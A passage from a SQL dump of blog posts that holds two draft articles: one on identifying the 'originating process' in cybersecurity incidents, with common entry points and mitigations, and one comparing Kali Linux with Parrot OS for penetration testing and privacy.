NULL, 1, 'draft', '2025-01-23 19:54:16', '2026-01-12 21:41:44', 'Information Security', '10 Best Careers in Cybersecurity for 2025', '', NULL),
(60, 'Understanding the Originating Process in Cybersecurity', 'understanding-the-originating-process-in-cybersecurity', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When a cybersecurity incident occurs, getting to the root cause is crucial. One of the most significant aspects of incident analysis is identifying the \"originating process.\" But what exactly does this term mean, and why is it so important for cybersecurity professionals and privacy enthusiasts?</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This blog dives deep into the concept of the originating process, its role in incident analysis, and the most frequently seen originating processes in attacks. Whether you\'re a seasoned cybersecurity expert or a curious learner, this guide will help you understand how analyzing originating processes can enhance internet privacy and protection against cyber threats.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What is the Originating Process in Cybersecurity?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The originating process refers to the root or initial process within a system that triggers a cyberattack or suspicious activity. Essentially, it’s where everything begins. 
Identifying this process is key because it provides essential clues about how an incident unfolded, the entry points attackers used, and which programs or systems were compromised first.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For example, if malicious activity is detected on a compromised computer, identifying its originating process could reveal whether the attack was initiated by a phishing email attachment, a vulnerable application, or a malicious script running in the background.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Why is this critical? By discovering the originating process, cybersecurity professionals can better understand attack vectors, patch vulnerabilities, and improve defenses to prevent future incidents.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why the Originating Process Matters in Cybersecurity</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here’s why the originating process is vital in cybersecurity practices and incident response:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Root Cause Analysis:</strong></b> It helps determine how and why an incident occurred.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Enhanced Threat Intelligence:</strong></b> By studying originating processes, security teams can identify patterns in attacks and refine their threat analysis.</li>\r\n 	<li class=\"text-body font-regular 
leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Improved Defense Mechanisms:</strong></b> Understanding how attacks originate allows professionals to fortify defenses and create more resilient systems.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Incident Mitigation:</strong></b> Identifying the source of malicious activity improves response times and limits the impact of an attack.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Most Common Originating Processes Seen in Cybersecurity Incidents</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity incidents can stem from various originating processes. Here are the most frequently observed ones during incidents, along with how they impact security landscapes:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. <b><strong class=\"font-bold\">Email Attachments and Phishing Links</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing remains one of the most common originating processes behind cyber incidents like ransomware infections and data breaches. 
Malicious email attachments or links trick users into opening a door for attackers.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Why It’s Common:</strong></b> Email is a universal medium that attackers exploit due to human error and lack of awareness.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Mitigation:</strong></b> Train employees on phishing schemes, and use advanced email filtering systems.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. <b><strong class=\"font-bold\">Web Browsers</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Web browsers are another frequent culprit, often exploited through malicious websites, compromised ads, and drive-by downloads.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Why It’s Common:</strong></b> Browsers connect users to the internet, making them a prime target for attackers.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Mitigation:</strong></b> Keep your browser updated, disable unnecessary plugins, and use security extensions to enhance privacy online.</li>\r\n</ul>\r\n<h3 class=\"font-bold 
text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. <b><strong class=\"font-bold\">Vulnerable Applications and Software</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Outdated software, particularly software that fails to follow secure coding practices, often becomes the originating process for incidents. These applications are gateways for attackers exploiting known vulnerabilities.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Why It’s Common:</strong></b> Many applications have vulnerabilities in the categories listed in the OWASP Top 10.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Mitigation:</strong></b> Regularly update software and implement robust patch management policies.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. 
<b><strong class=\"font-bold\">Compromised Credentials</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Brute-force attacks or leaked credentials can lead to unauthorized logins, making user account systems an originating process for data breaches.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Why It’s Common:</strong></b> Weak or reused passwords are pervasive in the workplace.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Mitigation:</strong></b> Enforce strong password policies and implement multi-factor authentication (MFA).</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. 
<b><strong class=\"font-bold\">Remote Desktop Protocol (RDP) Connections</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Attackers often exploit poorly protected RDP connections to gain access to networks.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Why It’s Common:</strong></b> Many companies use RDP for remote work setups, often without proper security configurations.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Mitigation:</strong></b> Secure RDP with strong passwords, network whitelisting, and VPNs.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. 
<b><strong class=\"font-bold\">Command and Scripting Interpreters</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Processes like PowerShell and bash are frequently exploited as the originating process for executing malicious scripts or payloads.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Why It’s Common:</strong></b> These are powerful tools that often lack restrictions, making them ideal for attackers.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Mitigation:</strong></b> Implement script control policies and restrict access to advanced scripting tools.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">7. 
<b><strong class=\"font-bold\">Removable Media and USB Devices</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Attackers sometimes use malicious USB devices to introduce malware into secure environments, often bypassing traditional network defenses.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Why It’s Common:</strong></b> Physical access often goes overlooked in incident prevention strategies.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Mitigation:</strong></b> Disable autorun features and use endpoint scanning solutions.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Evolving Role of the Originating Process in Cybersecurity Trends</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The importance of identifying the originating process will only grow as organizations face increasingly sophisticated threat actors. 
With AI-driven cybersecurity techniques and advancements in threat detection tools, cybersecurity professionals can analyze incidents more effectively, ensuring safer systems by the end of the mitigation process.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">As we approach 2025, staying ahead of cybersecurity trends will depend largely on mastering analysis techniques like isolating originating processes to improve incident response times and bolster defenses.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Getting Ahead of Threats with Better Processes</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The originating process isn\'t just a technical term—it’s a vital concept that can drive better cybersecurity outcomes. By understanding where attacks start and how they propagate, professionals can gain the upper hand against adversaries, protect sensitive data, and ensure systems are robust against potential threats.</p>', '', NULL, NULL, 1, 'draft', '2025-01-23 19:50:38', '2026-01-12 21:41:44', 'Information Security', 'Understanding the Originating Process in Cybersecurity', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(61, 'Which is Better for You? A Detailed Comparison of Kali Linux vs. Parrot OS', 'which-is-better-for-you-a-detailed-comparison-of-kali-linux-vs-parrot-os', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Choosing the right operating system is critical for cybersecurity professionals and privacy advocates. When it comes to penetration testing, ethical hacking, or maintaining your privacy online, <b><strong class=\"font-bold\">Kali Linux</strong></b> and <b><strong class=\"font-bold\">Parrot OS</strong></b> are two names that stand out. But which one is better suited to your needs? Let\'s compare these two powerhouse operating systems in detail, exploring their features, performance, security, and usability.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What Are Kali Linux and Parrot OS?</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Kali Linux</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Developed and maintained by Offensive Security, <b><strong class=\"font-bold\">Kali Linux</strong></b> is a Debian-based distribution geared specifically towards penetration testing and security auditing. 
Widely recognized in the cybersecurity industry, Kali comes pre-loaded with hundreds of <b><strong class=\"font-bold\">cybersecurity techniques</strong></b> and tools, such as Wireshark, Nmap, Metasploit, and Aircrack-ng.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Its primary focus is offensive security, making it an essential tool for penetration testers and ethical hackers who need a reliable OS to simulate attacks and identify vulnerabilities.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Features of Kali Linux:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">A large arsenal of pre-installed hacking and testing tools.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Frequent updates to incorporate tools covering the latest <b><strong class=\"font-bold\">OWASP Top 10 2023</strong></b> security risks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Detailed documentation for both beginners and experts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">A focus on offensive security testing.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Parrot OS</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] 
pb-[2px]\" dir=\"ltr\">Parrot OS, developed by Parrot Security, is another Debian-based distribution that combines <b><strong class=\"font-bold\">cybersecurity techniques</strong></b> with an emphasis on privacy and versatility. It offers tools not only for penetration testing but also for privacy enthusiasts who want to remain invisible on the internet.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Compared to Kali, Parrot OS is more user-friendly and versatile, making it a suitable choice for cybersecurity learners and privacy advocates alike.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Features of Parrot OS:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Pre-installed tools for penetration testing, forensics, and development.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Built-in anonymization tools to enhance <b><strong class=\"font-bold\">internet privacy</strong></b>.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">A lightweight design for smoother performance on lower-end machines.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Broad support for data protection and encrypted communication.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" 
dir=\"ltr\">Kali Linux vs. Parrot OS: A Head-to-Head Comparison</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Now that we’ve introduced both, let\'s break down the key differences across a variety of criteria.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. <b><strong class=\"font-bold\">Target Audience</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Kali Linux</strong></b> is designed for professionals, particularly penetration testers, ethical hackers, and advanced-level cybersecurity experts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Parrot OS</strong></b> caters to a broader audience, including cybersecurity learners, privacy advocates, and tech enthusiasts looking for versatility combined with privacy features.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. <b><strong class=\"font-bold\">Toolsets for Cybersecurity</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Kali Linux</strong></b> is packed with over 600 specialized tools tailored for penetration testing, offensive security, and network forensics. 
Tools like Hydra, Burp Suite, and John the Ripper make it ideal for uncovering vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Parrot OS</strong></b> also offers a wide range of tools, but with a balance between offensive and defensive techniques. Additionally, it includes development tools, such as those for programming and reverse engineering, as well as privacy-enhancing features like Anonsurf.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. <b><strong class=\"font-bold\">Focus on Privacy and Anonymity</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Kali Linux</strong></b> is not primarily designed for privacy but can be configured for it. It’s more focused on cybersecurity professionals carrying out specific testing tasks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Parrot OS</strong></b>, on the other hand, makes privacy a priority. It includes built-in tools for <b><strong class=\"font-bold\">staying invisible on the internet</strong></b>, such as Tor, I2P, and Anonsurf, which anonymize your web activity and ensure your browsing sessions are safe and private.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. 
<b><strong class=\"font-bold\">Ease of Use</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Kali Linux</strong></b> has a steeper learning curve. While its extensive toolset is ideal for experts, it may overwhelm beginners without prior knowledge of <b><strong class=\"font-bold\">cybersecurity techniques</strong></b>.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Parrot OS</strong></b>, however, is more beginner-friendly with a polished, lightweight interface and better hardware compatibility. It provides an easier transition for those just entering the cybersecurity field.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. <b><strong class=\"font-bold\">Performance</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Kali Linux</strong></b> can be resource-intensive, especially if you\'re running it on older hardware. 
While it’s optimized for high-performance tasks, low-end machines may struggle.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Parrot OS</strong></b>, thanks to its lightweight architecture, performs efficiently even on older or low-spec devices, making it a more versatile option for users with limited hardware capabilities.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. <b><strong class=\"font-bold\">Updates and Community Support</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Kali Linux</strong></b> is backed by Offensive Security and benefits from frequent updates that align with <b><strong class=\"font-bold\">cybersecurity trends 2025</strong></b>. Its community is highly active, though very technical in nature.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Parrot OS</strong></b> also boasts frequent updates and a supportive community but leans toward a broader, more inclusive user base—not just experts but learners as well.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">7. 
<b><strong class=\"font-bold\">Use Cases</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Kali Linux</strong></b> is largely tailored for penetration testing, network analysis, and offensive security projects where identifying vulnerabilities is key.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Parrot OS</strong></b>, with its privacy tools and expanded functionality, is equally suited for penetration testing, secure browsing, coding, and risk analysis.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" 